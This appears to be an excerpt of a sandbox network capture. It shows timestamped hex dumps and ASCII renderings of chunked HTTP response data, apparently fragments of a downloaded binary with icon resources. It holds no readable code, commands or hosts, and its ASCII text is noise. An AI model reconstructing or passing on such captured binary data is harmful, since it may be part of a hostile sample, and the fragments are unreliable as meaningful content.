                                                        2022-11-20 22:29:22 UTC424INData Raw: 32 30 30 30 0d 0a 54 25 cb be 18 fd e5 83 11 7a 22 3e f3 d6 48 a4 04 ff 8f 61 e8 91 73 5e ad 2d b5 4f 32 cc 7f 97 fb 0a 72 f1 02 f7 e9 89 87 c0 76 03 90 83 b7 45 70 f4 5b be f0 7a 64 2a da 98 b3 77 be a8 3f 0a b5 ca 96 5c f3 c6 fc 04 04 e8 d6 b8 f0 78 ad 56 ce 29 e1 bd c6 59 67 5a a9 c6 59 6c 89 0f 31 a5 b2 be 27 14 2a aa 05 d3 a8 83 fc 8e 9b 6a 36 bc 60 de a8 a9 07 ae f0 72 0f 1a e9 68 cd 92 3c 65 57 71 a1 0b 20 41 71 0a 7f 90 25 53 e1 7a 6b 0e 63 1f 8d b8 91 ac ef 1a 8b 2d 9d 53 80 dc 1e c0 27 85 49 c6 98 c5 25 d8 ee c3 8c 61 bd 49 28 0a 1e 47 ab c3 af f0 a9 30 64 30 1c 9f a6 9f 63 f9 87 47 11 9e ba 75 f8 08 99 18 89 61 7b 57 1b ea 4d 3d 0e e5 94 83 a1 7e 94 fb 75 40 74 f9 e8 f3 e7 91 4e fc 2f 2e 17 70 8f 20 fd 82 c1 5a bf 5a 81 3a 3d 95 7a c3 ce 86 93
                                                        Data Ascii: 2000T%z">Has^-O2rvEp[zd*w?\xV)YgZYl1'*j6`rh<eWq Aq%Szkc-S'I%aI(G0d0cGua{WM=~u@tN/.p ZZ:=z
                                                        2022-11-20 22:29:22 UTC432INData Raw: f9 6e 73 6a 5a 3f
                                                        Data Ascii: nsjZ?
                                                        2022-11-20 22:29:22 UTC432INData Raw: 0d 0a
                                                        Data Ascii:
                                                        2022-11-20 22:29:22 UTC432INData Raw: 32 30 30 30 0d 0a f9 e6 65 bf 56 0c fd ea c7 dd 0d b6 91 46 96 b9 e3 46 e8 5d a3 54 e0 1a c3 e8 f9 19 fe 19 e1 40 46 fe 83 02 c7 db 97 b8 ad e5 82 18 67 7c 83 dc d9 21 b5 4b 47 9d eb 71 2b 91 71 4e 94 f8 3f 56 df 40 88 43 9a 8d a4 be f0 9c 20 d9 8d 2b 43 e6 f0 cb 62 5e c4 8a cd 0d e3 ca f7 0b cc 7b 15 b0 ec 86 4b 1b 28 c3 66 08 ee 38 4a 77 05 bc e6 02 d1 ad e0 7f a2 00 00 ad ab a3 7b 8d e5 a5 9c 0c 99 ab 88 a1 28 e1 96 d9 ee bb b8 62 a3 9f f3 c8 7f ca aa 18 57 50 62 e3 84 e9 d7 1e 77 de eb c2 67 20 2f c6 6f 27 55 be 02 83 98 71 1d 26 7d eb ff 89 7f 6b fd 57 27 ca a7 7d ff 34 bf c1 ca b6 29 3a 92 b4 f7 47 50 27 ea 1e 91 88 ab 4a 07 c9 83 94 c9 ff 33 40 b6 d7 ea 7d 62 f5 42 c3 4f 43 22 58 40 82 1c 2a d7 f0 fb 94 15 95 e8 fc ce 5b fa 59 be 4b f2 51 cf 76 9e
                                                        Data Ascii: 2000eVFF]T@Fg|!KGq+qN?V@C +Cb^{K(f8Jw{(bWPbwg /o'Uq&}kW'}4):GP'J3@}bBOC"X@*[YKQv
                                                        2022-11-20 22:29:22 UTC440INData Raw: 40 cd c6 4c a2 a6
                                                        Data Ascii: @L
                                                        2022-11-20 22:29:22 UTC440INData Raw: 0d 0a
                                                        Data Ascii:
                                                        2022-11-20 22:29:22 UTC440INData Raw: 31 66 66 38 0d 0a df d7 5d d7 2a 97 e5 45 ae 11 38 d3 f8 90 40 d9 da c4 14 44 41 be 6c 96 1a 52 55 55 db fd 04 19 84 16 20 6b f3 ad 13 c1 ef e2 46 bd 98 48 4d bb c0 22 f2 8c 8c f1 3f d5 e9 ca 5e d2 78 e3 54 3e 45 bd 5b d4 bd 6f d4 10 3c 5c 6f db 16 7e 72 f6 d5 1b 2c 02 59 57 9b 2a 43 91 f6 9e e6 1f 44 59 ab ed d8 9b 71 c6 83 4b 22 cc 8b 82 4c 17 33 75 1c bf 31 1f dd d5 df d9 9c 8c eb 39 2a ba ad cf f4 33 81 10 24 78 b0 a5 e7 b3 32 dd 65 30 b0 86 0c 89 5a 87 61 5f 2e e1 50 a3 95 95 55 83 37 ad d4 f9 fa 81 66 d6 12 dd 76 dc 4e 61 87 6a 54 1e a8 3b 4b 73 98 2d 08 0d 69 85 41 5a fe cb da 6d dd 95 d8 dc 84 ed 6e 61 18 cd 7e 47 57 ea 8c 5e 5e 09 7b 40 28 d9 b6 bf 17 0a 82 ef 3a 79 4c f6 fd 74 e0 19 12 2e 76 c9 76 28 5f d0 89 43 59 c0 00 0f da 64 b0 90 5e ff e8
                                                        Data Ascii: 1ff8]*E8@DAlRUU kFHM"?^xT>E[o<\o~r,YW*CDYqK"L3u19*3$x2e0Za_.PU7fvNajT;Ks-iAZmna~GW^^{@(:yLt.vv(_CYd^
                                                        2022-11-20 22:29:22 UTC448INData Raw: 32 30 30 30 0d 0a
                                                        Data Ascii: 2000
                                                        2022-11-20 22:29:22 UTC448INData Raw: e0 ac f4 58 e6 ab 8f 3f af 92 14 26 6e 31 49 94 db 00 39 e1 c3 b0 64 75 4a 6d bb 00 3d b7 3e b0 b9 04 e5 b6 e0 30 59 f2 40 2a b7 8e 22 b0 6c 9e 30 2f 08 69 0a cb 3b f6 17 2c 6a b8 70 29 dc 33 23 31 62 72 9b b1 92 1c 77 14 5a 5b d3 31 db 96 d7 fa 71 8b 4c c2 89 f9 d8 ca 01 64 02 5b 4f 8d 8a f1 8a b6 c4 b2 b5 ba 3a f6 70 9d 17 ed 0c 92 c8 ac 73 8c 3c 0a 1b 70 a6 cb 04 6d f0 a6 d5 ac a5 d9 cb ab 20 f1 36 b3 de 44 48 c9 b0 e8 29 cd 4d b3 56 ab a4 63 f4 43 a9 6c bc 20 ea 5e 38 f6 cb 38 73 6e c2 b0 77 f7 60 e9 20 8c 9c a4 31 3a 84 e7 f1 db a9 35 fd 52 d5 7b 3b 26 95 ef 14 77 70 14 7c 1c 3c 20 25 77 dc 9a c4 10 c1 0f 46 c9 5d a1 30 1e 91 01 0d 4b 16 14 c7 70 81 18 06 ac 11 24 e4 51 75 49 31 9e 3c 35 7f 7d 58 57 f3 39 68 d9 7e 3d 8f 37 a0 ac 10 7f fd 6a 8c 51 f6
                                                        Data Ascii: X?&n1I9duJm=>0Y@*"l0/i;,jp)3#1brwZ[1qLd[O:ps<pm 6DH)MVcCl ^88snw` 1:5R{;&wp|< %wF]0Kp$QuI1<5}XW9h~=7jQ
                                                        2022-11-20 22:29:22 UTC456INData Raw: 0d 0a
                                                        Data Ascii:
                                                        2022-11-20 22:29:22 UTC456INData Raw: 32 30 30 30 0d 0a e8 1f 09 17 fe be 7a 53 40 d3 ae 9e 4e f5 fe c1 52 d7 5b fa 7f cd 9d 5f 47 cd 67 f2 44 34 49 d3 50 49 55 11 00 76 db 54 a8 29 25 1b 57 ad 76 f6 b8 85 ce 45 fb f3 81 db cf 78 8f fc 7a 9c 68 08 10 7b a4 58 18 23 a6 41 a0 50 91 e0 62 c5 bd 1e 55 36 ae 78 b6 b2 ae f5 b4 d9 a9 66 3b 5a 13 d4 06 d4 f0 0f 4a c7 62 13 e6 4e 33 03 5c 94 1c 14 06 bf 3e 2c 7e 25 a8 55 8a 84 a8 03 b4 30 a1 e7 1c 4b 5e 20 51 c5 dd 25 c3 74 17 43 a4 29 86 8b 21 e6 9a 67 c5 f7 06 d3 d1 0c b2 d1 68 e2 80 1a 7e 16 e3 db 97 44 a3 06 6d 47 98 0a cd 11 f1 3b 0f c5 d8 5b 9e b9 70 d3 08 30 90 12 19 52 c6 31 72 1c 97 68 aa a0 db f3 89 d4 31 6e e2 76 c7 74 84 5a 12 4f 39 ef d4 39 07 b7 ab ae 4f 02 24 e4 64 28 11 03 46 69 e2 ce 73 af 52 82 f6 f9 d4 38 5e 43 06 60 d2 4b 0c 22 d0
                                                        Data Ascii: 2000zS@NR[_GgD4IPIUvT)%WvExzh{X#APbU6xf;ZJbN3\>,~%U0K^ Q%tC)!gh~DmG;[p0R1rh1nvtZO99O$d(FisR8^C`K"
                                                        2022-11-20 22:29:22 UTC464INData Raw: 55 ed f2 19 f4 e0
                                                        Data Ascii: U
                                                        2022-11-20 22:29:22 UTC464INData Raw: 0d 0a
                                                        Data Ascii:
                                                        2022-11-20 22:29:22 UTC464INData Raw: 32 30 30 30 0d 0a 4f eb d0 2b 75 be bb ad 7f 8d ad d2 82 da 21 5d 31 66 9d 89 d9 6d 68 ad a7 20 16 04 f8 27 cf 15 c4 44 47 ae 6b b4 f9 40 ea 84 97 c0 28 7e 71 6a 34 90 b2 70 ea 60 5a 4b 0f 6f 47 21 e0 8c 6a 92 a3 e0 64 6f 57 fe b8 53 40 f3 1e e1 ab 36 ce e3 03 18 86 26 cd d2 ae 5a f9 92 ca 5b a8 66 a4 48 da eb 3d be 29 f8 20 a8 6c 2d 64 fe a0 3b 1d 1e a0 2a dc 46 9e f7 ec 44 b6 e5 2a 74 aa 16 50 eb 95 94 ad 13 59 2d 3f 0f 79 0d 69 8d 27 71 63 f2 2f 9e 2c f2 c8 88 c8 fa 96 15 49 97 1a a1 df 6c 07 c5 75 76 a8 32 a3 8d b0 de 4e e9 e8 6e 12 78 3f 19 92 32 dd e0 04 7c 38 1a 43 9e c7 59 74 e2 e5 71 0b ff 9f f1 94 4d a4 85 e8 2b 59 0e 95 0f 7f 5f ea 90 5b b7 c3 ee dd e0 30 73 fe fd 05 f8 0e 5e 57 fd a9 1c dc 7c 62 a8 f9 f5 98 72 2f 11 35 76 ab 5d de 57 f9 58 f8
                                                        Data Ascii: 2000O+u!]1fmh 'DGk@(~qj4p`ZKoG!jdoWS@6&Z[fH=) l-d;*FD*tPY-?yi'qc/,Iluv2Nnx?2|8CYtqM+Y_[0s^W|br/5v]WX
                                                        2022-11-20 22:29:22 UTC472INData Raw: 7b 00 6a 7c a5 00
                                                        Data Ascii: {j|
                                                        2022-11-20 22:29:22 UTC472INData Raw: 0d 0a
                                                        Data Ascii:
                                                        2022-11-20 22:29:22 UTC472INData Raw: 32 30 30 30 0d 0a 7e 84 81 00 52 67 7f 00 60 65 7c 00 83 82 7b 00 83 82 7d 00 4e 68 7e 00 7c 7a 9b 00 4a 55 7e 00 7e 81 7a 00 64 61 81 00 59 79 81 00 59 7f 95 00 7b 7a ae 00 31 30 2a 00 6c 7e 9c 00 5e 79 80 00 5b 85 a5 00 77 83 86 00 81 83 85 00 6c 82 b2 00 5f 7f 9a 00 5f 79 85 00 51 72 80 00 70 7a 80 00 5e 83 b6 00 50 6c 99 00 7e 7f 81 00 69 80 9e 00 70 7c 7b 00 7d 7c c2 00 60 7c ac 00 83 7e b4 00 59 7d 7b 00 65 82 b5 00 2a 2a 2a 00 79 7b 85 00 68 82 bd 00 6a 84 b0 00 6b 80 7f 00 3d 4a 7d 00 80 81 7f 00 7f 7c 85 00 7f 80 83 00 5d 73 a7 00 6a 7d bf 00 7e 7b b9 00 4e 73 7c 00 6b 80 bb 00 6d 7d b3 00 62 7c ba 00 7e 7f 80 00 60 82 c3 00 62 80 80 00 7e 7e 7a 00 8e 8e 8e 8e 8e 8e 8e 8e 8e 8e 8e 8e 8e 8e 8e 8e 8e 8e 8e 8e 8e 8e 8e 8e 8e 8e 8e 8e 8e 8e 8e 8e 8e
                                                        Data Ascii: 2000~Rg`e|{}Nh~|zJU~~zdaYyY{z10*l~^y[wl__yQrpz^Pl~ip|{}|`|~Y}{e***y{hjk=J}|]sj}~{Ns|km}b|~`b~~z
                                                        2022-11-20 22:29:22 UTC480INData Raw: 9e 53 8e ac 9e 5d
                                                        Data Ascii: S]
                                                        2022-11-20 22:29:22 UTC480INData Raw: 0d 0a
                                                        Data Ascii:
                                                        2022-11-20 22:29:22 UTC480INData Raw: 32 30 30 30 0d 0a 8c 9f 94 4c 8e 9a a4 62 7b 82 a2 68 83 96 b3 72 7b 72 7f 81 67 57 7d b7 84 7f 89 c3 6b 83 9d ba 7f 7a a0 ad 65 7b 9e bd 69 80 9c bb 64 7a 81 b8 64 7d 8a b6 6b 84 9a b2 61 75 8f bb 5c 7a 94 b7 54 7d 9e bd 5f 7e a5 b6 63 7e a7 c0 6b 7e a1 c3 6a 7f a0 b1 60 7d 94 c3 60 7b a7 bd 67 7f a5 b8 56 5f 7c b5 47 4e 80 c4 46 3d 7a 82 00 00 00 00 98 80 c8 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b1 83 c8 24 b7 89 bb 4c a9 8b ca 4e ad 8a c3 40 9e 7e d3 38 b4 89 c3 30 aa a5 c1 3a 95 9c c0 51 a2 93 ad 5a 9d 93 94 6b 96 a2 b8 69 9b a4 b2 63 86 93 b2 63 87 88 ae 63 81 96 99 68 7e 87 8f 6e 7e 95 af 63 7a 83 7c 80 5f 52 82 ad 82 7a 8c b7 64 7d 94 c0 64 7c 9a bf 64 7b a7 bc 5d 7e 9a b5 5e 7e aa c1 64 7a 94 b5 68 81 a4 bc 5d
                                                        Data Ascii: 2000Lb{hr{rgW}kze{idzd}kau\zT}_~c~k~j`}`{gV_|GNF=zB$LN@~80:QZkiccch~n~cz|_Rzd}d|d{]~^~dzh]
                                                        2022-11-20 22:29:22 UTC488INData Raw: ac 41 00 00 ac 41
                                                        Data Ascii: AA
                                                        2022-11-20 22:29:22 UTC488INData Raw: 0d 0a
                                                        Data Ascii:
                                                        2022-11-20 22:29:22 UTC488INData Raw: 32 30 30 30 0d 0a 00 00 ac 41 00 01 ac 41 80 00 ac 41 c0 01 ac 41 00 00 01 00 05 00 30 30 00 00 01 00 08 00 a8 0e 00 00 01 00 20 20 00 00 01 00 08 00 a8 08 00 00 02 00 30 30 00 00 01 00 20 00 a8 25 00 00 03 00 20 20 00 00 01 00 20 00 a8 10 00 00 04 00 10 10 00 00 01 00 20 00 68 04 00 00 05 00 00 00 00 00 28 00 00 00 18 00 00 00 30 00 00 00 01 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ed a2 f0 00 7f 7f a3 00 92 92 8a 00 7e 9b b5 00 e0 1f ed 00 7c 0f 57 00 19 0d 59 00 7f 95 ba 00 77 09 2c 00 f5 d6 7b 00 f1 c2 22 00 92 97 95 00 7f 80 8e 00 f8 f9 ee 00 80 80 7e 00 7f 80 99 00 d4 f5 7d 00 ef 5d 7f 00 f3 ef f1 00 d8 08 e4 00 80 81 b4 00 8d 90 9b 00 7e a0 b2 00 81 7f ae 00 f2 ab a2 00 aa b0 ad 00 75 0b 7a 00 f4 a1 d7 00 f5
                                                        Data Ascii: 2000AAAA00 00 % h(0~|WYw,{"~}]~uz
                                                        2022-11-20 22:29:22 UTC496INData Raw: 00 00 00 00 00 00
                                                        Data Ascii:
                                                        2022-11-20 22:29:22 UTC496INData Raw: 0d 0a
                                                        Data Ascii:
                                                        2022-11-20 22:29:22 UTC496INData Raw: 32 30 30 30 0d 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 7f 7e c8 80 7f 7f ba ae c1 aa b7 b6 b2 a8 b8 ad a4 9f b8 80 80 7f c2 81 7f 7f b8 7f 7f 80 7f 80 94 7f 47 81 7e 80 81 80 80 80 c0 7f 80 80 b8 a7 8e a9 b4 9d 98 a0 b6 a4 a2 9f c1 90 89 98 bb 8e 91 9e c5 8d 8b 97 b9 94 8b 81 ba 84 82 8a b9 99 9a 90 b8 7f 92 84 b9 7f 81 7f bf 80 81 81 7f 7f 7f 8d 5b 84 c9 7f 3e 82 ce 84 3c 8c d3 81 48 92 cc 84 42 9c ce 80 4b 9f cd 81 46 a6 cb 7f 4a a5 cd 91 3e aa d2 87 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 7f 80 ae 7e 7e 80 c0 b1 b1 b0 b4 ae 9f b5 b9 7f 7f 81 ba 7f 7f 80 b3 7f 7f 7e 7f 7f 94 80 55 7f b9 8d 51 95
                                                        Data Ascii: 2000~G~[><HBKFJ><~~~UQ
                                                        2022-11-20 22:29:22 UTC504INData Raw: 03 ff ff ff 00 00
                                                        Data Ascii:
                                                        2022-11-20 22:29:22 UTC504INData Raw: 0d 0a
                                                        Data Ascii:
                                                        2022-11-20 22:29:22 UTC504INData Raw: 31 66 66 38 0d 0a ff ff ff ff ff ff 00 00 ff ff ff ff ff ff 00 00 28 00 00 00 20 00 00 00 40 00 00 00 01 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7f 7f 91 00 45 1f 8f 00 80 81 9d 00 63 81 a4 00 5b 2d e0 00 7e 8c b1 00 7f 80 a0 00 61 80 9d 00 5d 1e 81 00 e3 e6 e6 00 81 92 cc 00 e4 3e 2d 00 81 8b c2 00 56 80 a8 00 c2 96 e3 00 58 81 b0 00 39 25 4d 00 aa 97 e5 00 81 1d 73 00 e8 80 7f 00 7e 84 b0 00 81 25 1c 00 45 15 af 00 69 80 a3 00 d6 31 94 00 81 7f 9c 00 77 7f 8d 00 81 7e 98 00 5f 7f 8d 00 d6 2e e6 00 df 93 c6 00 81 b0 c7 00 1d 1b 20 00 ac 12 b4 00 da 71 ab 00 80 7f a8 00 96 20 7e 00 1e 18 1a 00 5d 80 a9 00 d8 1c 62 00 64 7f 9f 00 ad 81 e5 00 8a 80 dd 00 7b 7f 97 00 e5 55 49 00 80 94 c3 00 7f 7f 9c 00 7e 7f a0 00 81
                                                        Data Ascii: 1ff8( @Ec[-~a]>-VX9%Ms~%Ei1w~_. q ~]bd{UI~
                                                        2022-11-20 22:29:22 UTC512INData Raw: 32 30 30 30 0d 0a
                                                        Data Ascii: 2000
                                                        2022-11-20 22:29:22 UTC512INData Raw: 7e 92 c0 b9 80 92 af bc 80 83 b3 c0 7f 80 c7 b4 7f 7f c3 bf 77 88 b6 c3 81 89 bd c2 7e 80 ba bb 76 80 b7 bf 79 81 c3 c0 76 80 ad c4 7d 8c b0 b8 7e 7f a9 c0 43 7f 92 c0 51 80 7f 80 80 c7 c3 36 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 81 c4 be 33 7e bb 92 30 80 c0 80 46 55 80 8d 81 45 7f 8d bc 6a 7e 95 b5 55 80 91 ba 52 81 86 ce 51 7f 8d be 50 80 90 be 81 7f a6 bd 95 b3 c1 ce 7e 96 bd c3 7f 86 c6 c2 7e 87 af b5 81 85 c0 bf 7f 9a b6 bb 81 8d c1 b8 80 86 c2 c4 7f 90 b5 c4 80 96 b4 b5 80 9d be c4 72 7e 9e bb 52 80 97 c0 7e 7f b9 b5 7f 7f b8 be 59 7f 93 ba 81 86 b1 ba 80 9c c2 bd 80 8d bf c4 80 93 c5 bf 77 7f bb c1 77 89 b9 b3 7d 80 c2 c0 7f 7f bf cd 76 7e b9 b7 77 80 ae b7 6d 81 c1 bd 81 7f b9 bb 7e 93 b0 c2 66 80 90 c3 48 80 90 90 81 ca c2 3f 7f cc ba
                                                        Data Ascii: ~w~vyv}~CQ63~0FUEj~URQP~~r~R~Yww}v~wm~fH?
                                                        2022-11-20 22:29:22 UTC520INData Raw: 0d 0a
                                                        Data Ascii:
                                                        2022-11-20 22:29:22 UTC520INData Raw: 32 30 30 30 0d 0a 80 ba c0 4a 5f 7f 80 7e 5c 81 8f ca 7f 8d b3 c4 7f 8e be b3 7d 89 bf bf 7b 81 c5 bc 7e 7f c1 c6 80 87 b5 ba 7f 88 c0 ba 80 8b c6 c7 7f 97 c0 c1 7f 9f b6 c1 7e 94 c8 c6 7e 9f be bc 80 9d c6 b6 81 a8 ba b2 81 ab bb c4 7f 80 c1 bf 5d 7f 86 9f 80 a5 a4 5a 7f 9e a8 50 92 7f 82 44 7e a0 a0 2e 80 cd d9 34 7f ca c2 38 80 cc c6 42 80 8e bc 49 3b 4c 80 39 00 00 00 00 5f 80 6f 31 81 c3 b0 3e 7f 81 81 40 76 7f 7f 6a 68 7e 9b b5 81 96 b4 bf 81 95 c3 c1 7f 81 c1 c0 80 7f c0 bf 78 80 bb c4 80 86 b8 b2 7f 7f bd b4 80 97 c4 c7 80 92 bb b4 81 9a be c9 7e 99 c0 bf 80 98 ba c6 80 a3 bb bd 7f a9 c6 c4 7f 9f b0 b6 7e 7e aa b3 53 7e 87 80 81 b8 af 55 81 c5 b7 52 7f ad ae 58 88 ac b2 58 80 bc c2 44 80 cd c7 3b 7e c8 b9 3b 80 80 bc 37 00 00 00 00 00 00 00 00 4d
                                                        Data Ascii: 2000J_~\}{~~~]ZPD~.48BI;L9_o1>@vjh~x~~~S~URXXD;~;7M
                                                        2022-11-20 22:29:22 UTC528INData Raw: ff ff ff ff 00 00
                                                        Data Ascii:
                                                        2022-11-20 22:29:22 UTC528INData Raw: 0d 0a
                                                        Data Ascii:
                                                        2022-11-20 22:29:22 UTC528INData Raw: 32 30 30 30 0d 0a ff ff ff ff ff ff 00 00 80 00 00 00 ff ff 00 00 80 00 00 00 ff ff 00 00 00 00 00 00 7f ff 00 00 00 00 00 00 7f ff 00 00 00 00 00 00 7f ff 00 00 00 00 00 00 7f ff 00 00 00 00 00 00 7f ff 00 00 00 00 00 00 7f ff 00 00 00 00 00 00 7f ff 00 00 00 00 00 00 7f ff 00 00 00 00 00 00 7f ff 00 00 00 00 00 00 7f ff 00 00 00 00 00 00 7f ff 00 00 00 00 00 00 7f ff 00 00 00 00 00 00 7f ff 00 00 00 00 00 00 7f ff 00 00 00 00 00 00 7f ff 00 00 00 00 00 00 ff ff 00 00 00 00 00 00 ff ff 00 00 00 00 00 00 ff ff 00 00 00 00 00 00 ff ff 00 00 00 00 00 00 ff ff 00 00 00 00 00 00 ff ff 00 00 00 00 00 00 ff ff 00 00 00 00 00 00 ff ff 00 00 00 00 00 00 ff ff 00 00 00 00 00 00 ff ff 00 00 00 00 00 00 ff ff 00 00 00 00 00 00 ff ff 00 00 00 00 00 00 ff ff 00 00 00
                                                        Data Ascii: 2000
                                                        2022-11-20 22:29:22 UTC536INData Raw: c1 c4 7e 7e 7f c7
                                                        Data Ascii: ~~
                                                        2022-11-20 22:29:22 UTC536INData Raw: 0d 0a
                                                        Data Ascii:
                                                        2022-11-20 22:29:22 UTC536INData Raw: 32 30 30 30 0d 0a 7f 7e 7f c7 9c c6 8b 44 8c ca 82 37 9d bc 95 3f 9e b2 96 44 a2 c7 9a 45 b1 ac ac 3a bf 92 d2 3b b8 85 c9 37 b6 be ac 2c af be b2 23 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7e 7e 81 c8 80 7e 7f bb bb bb c4 b4 a4 a7 aa bf 92 90 94 bb 80 81 80 c0 c8 bb bd bd bf c3 c0 c2 c2 b9 c7 c3 c2 ce cf be b9 ca c7 c3 81 7f 7f c7 98 9e 99 b3 bb bd b3 c3 c5 c0 bc c9 c0 c2 c3 be a1 b5 b2 c9 af bb a9 cb 7e 7f 82 c7 81 7f 7f ba a5 a5 b7 be ba b1 b7 bc b2 b6 ae bf a5 b9 b1 bf a9 b4 b3 bf 7e 80 81 c1 80 80 84 c1 96 a6 a0 c1 c2 ba b9 bf 81 81 7f bf 81 81 80 d1 7f ca 88 36 7f c5 86 40 80 d5 7e 3a 94 ae a1 3f 96 b3 9e 3b bb 90 c3 42 b3 86 cb 34 bc 8e d2 3e b1 c0 b3 27 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                        Data Ascii: 2000~D7?DE:;7,#~~~~~6@~:?;B4>'
                                                        2022-11-20 22:29:22 UTC544INData Raw: 80 25 63 80 80 29
                                                        Data Ascii: %c)
                                                        2022-11-20 22:29:22 UTC544INData Raw: 0d 0a
                                                        Data Ascii:
                                                        2022-11-20 22:29:22 UTC544INData Raw: 32 30 30 30 0d 0a 4e 7e 80 38 47 7d 80 2d 4f 80 7f 1f 7f 56 80 26 85 57 80 28 00 00 00 00 00 00 00 00 00 00 00 00 80 7f 7e cc c3 c5 c4 c1 9f 9b ad c9 7f 7e 7e be bc bc bc ba c5 bc be c7 c0 bd ab c8 bf c4 be bc 7f 80 7f bd c4 b8 c9 b4 bb bf bb c0 ba b6 ba c9 b2 c2 c5 c6 80 80 81 b8 cf c8 c0 c5 c6 c3 bc cb cf c4 c9 cb a6 9f a3 b8 7f 7e 7e c3 a1 aa a2 b7 be b0 ba ca 80 7e 80 bb 7e 7e a9 43 40 7b 81 27 54 66 81 20 5c 5a 7f 32 5d 5d 80 20 00 00 00 00 7e 53 7f 20 80 57 7f 2d 00 00 00 00 00 00 00 00 7f 7f 81 be bc c0 bc b5 a7 a9 a2 cb 7f 7f 81 c4 c2 cc b8 c5 be c7 bb ca b9 c8 b2 c4 c2 bc be bf 7f 7f 7f c0 ba b7 bb be c5 c2 ba c3 be c3 be be bd b5 bd bf 80 81 7f b8 bf b3 c7 bc be c7 b2 c9 c1 b1 cb c0 ad af b8 bd 7e 81 80 c2 a3 a3 9b c0 b3 ba bb b8 7f 80 7e c1 b9
                                                        Data Ascii: 2000N~8G}-OV&W(~~~~~~~~C@{'Tf \Z2]] ~S W-~~
                                                        2022-11-20 22:29:22 UTC552INData Raw: f9 f9 f9 f9 f9 f9
                                                        Data Ascii:
                                                        2022-11-20 22:29:22 UTC552INData Raw: 0d 0a
                                                        Data Ascii:
                                                        2022-11-20 22:29:22 UTC553INData Raw: 32 30 30 30 0d 0a f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 87 a2 e8 e8 e8 e8 e8 e8 a2 87 f9 f9 f9 f9 f9 05 f9 05 f9 05 05 05 05 05 05 05 05 05 05 05 05 05 05 05 05 05 05 05 05 05 05 05 05 05 05 05 05 f9 87 a2 e8 e8 e8 e8 e8 e8 a2 87 f9 05 2c 05 2c 05 2c 2c 2c 05 2c 2c 2c 2c 2c 2c 2c 2c 4d 2c 4d 4d 4d 4d 4d 4d 9d 4d 9d 4d 9d 4d 9d 4d 9d 4d 9d 28 87 a2 e8 e8 e8 e8 e8 e8 a2 87 05 05 2c 05 2c 05 2c 05 2c 2c 2c 2c 05 2c 2c 2c 2c 2c 2c 4d 2c 2c 2c 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 28 87 a2 e8 e8 e8 e8 e8 e8 a2 87 05 05 2c 05 2c 05 2c 05 2c 05 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 4d 2c 2c 4d 3e 3e 3e 4d 4d 4d 4d 4d 4d 4d 4d 4d 28 87 a2 e8 e8 e8 e8 e8 e8 a2 87 f9 05 2c 05 2c 05 2c 05 2c 2c 05 2c 05 2c 2c 05 2c 2c 2c
                                                        Data Ascii: 2000,,,,,,,,,,,,,M,MMMMMMMMMMM(,,,,,,,,,,,,,M,,,MMMMMMMMMMMMMM(,,,,,,,,,,,,,,,M,,M>>>MMMMMMMMM(,,,,,,,,,,,
                                                        2022-11-20 22:29:22 UTC561INData Raw: c9 30 00 00 00 00
                                                        Data Ascii: 0
                                                        2022-11-20 22:29:22 UTC561INData Raw: 0d 0a
                                                        Data Ascii:
                                                        2022-11-20 22:29:22 UTC561INData Raw: 32 30 30 30 0d 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 81 7f ba 80 7f 7f c1 80 7e 81 c2 7f 81 80 c3 7f 80 7f d2 80 80 7f b6 80 80 7f c6 7e 7f 80 cd 7e 7e 7e be 80 81 7e ca 7f 80 7f ce 7f 80 80 c8 7e 81 7f c1 7e 7f 7f c9 7f 7f 7e c3 80 7e 7f cd 7f 7e 7e c6 80 80 81 c3 7e 80 80 cb 7f 7e 81 d1 7f 7f 81 bd 7f 80 7f ca 7f 80 7f c4 80 80 7e c5 7e 7f 80 c8 7f 80 7f c8 80 7f 81 cb 80 7e 80 cf 81 80 7e c4 7e 7f 81 c4 81 7f 7f bf 80 80 7f cb 80 7f 7e c6 80 81 7f c6 81 81 80 bf 81 7f 7e cf 81 80 7e cd 80 80 7e c4 7f 80 81 cb 81 80 81 c0 80 80 80 c0 81 7e 80 ba 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                        Data Ascii: 2000~~~~~~~~~~~~~~~~~~~~~~~~
                                                        2022-11-20 22:29:22 UTC569INData Raw: 86 3f 98 c8 85 37
                                                        Data Ascii: ?7
                                                        2022-11-20 22:29:22 UTC569INData Raw: 0d 0a
                                                        Data Ascii:
